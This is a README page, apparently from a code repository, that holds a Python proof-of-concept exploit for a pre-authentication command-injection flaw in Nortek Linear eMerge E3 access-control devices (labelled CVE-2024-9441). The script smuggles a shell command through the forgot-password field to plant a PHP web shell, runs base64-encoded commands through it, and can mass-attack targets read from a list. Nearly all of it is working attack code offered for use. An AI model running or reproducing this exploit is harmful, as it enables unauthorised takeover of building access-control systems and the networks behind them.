README.md
Rendering markdown...
import argparse
import base64
import requests
# Function to exploit a single target
def exploit(target, port, cmd):
url = f"https://{target}:{port}/index.php?c=user&m=forgot_password"
# Payload to create malicious PHP file
PAYLOAD = {'login_id': '`echo \'<?php exec(base64_decode($_POST["c"]),$output);echo(implode("\n",$output));?>\' > img/index.html`'}
try:
response = requests.post(url, data=PAYLOAD, verify=False, timeout=5)
if response.status_code == 200:
print("[+] Payload uploaded successfully.")
else:
print(f"[-] Failed to upload payload on {target}:{port}.")
return
cmd_encoded = base64.b64encode(cmd.encode()).decode()
exec_url = f"https://{target}:{port}/img/index.html"
exec_payload = {'c': cmd_encoded}
response = requests.post(exec_url, data=exec_payload, verify=False, timeout=5)
if response.status_code == 200:
print(f"[+] Command executed on {target}:{port}:")
print(response.text)
else:
print(f"[-] Exploit failed on {target}:{port}.")
except Exception as e:
print(f"[-] Error with {target}:{port}: {e}")
# Function to perform mass scanning using a list of targets
def mass_scan(targets_file, cmd):
with open(targets_file, 'r') as file:
for line in file:
target, port = line.strip().split(':')
exploit(target, port, cmd)
def main():
parser = argparse.ArgumentParser(description="Nortek Linear eMerge E3 Pre-Auth RCE PoC (CVE-2024-9441)")
parser.add_argument('--ip', help="Target IP address", type=str)
parser.add_argument('--port', help="Target port", type=int, default=443)
parser.add_argument('--cmd', help="Command to execute", type=str, default="/bin/ls -al /spider/web")
parser.add_argument('--list', help="File containing list of targets (IP:port)", type=str)
args = parser.parse_args()
if args.list:
mass_scan(args.list, args.cmd)
elif args.ip:
exploit(args.ip, args.port, args.cmd)
else:
print("[-] Please provide either a single target (--ip) or a list of targets (--list).")
if __name__ == "__main__":
main()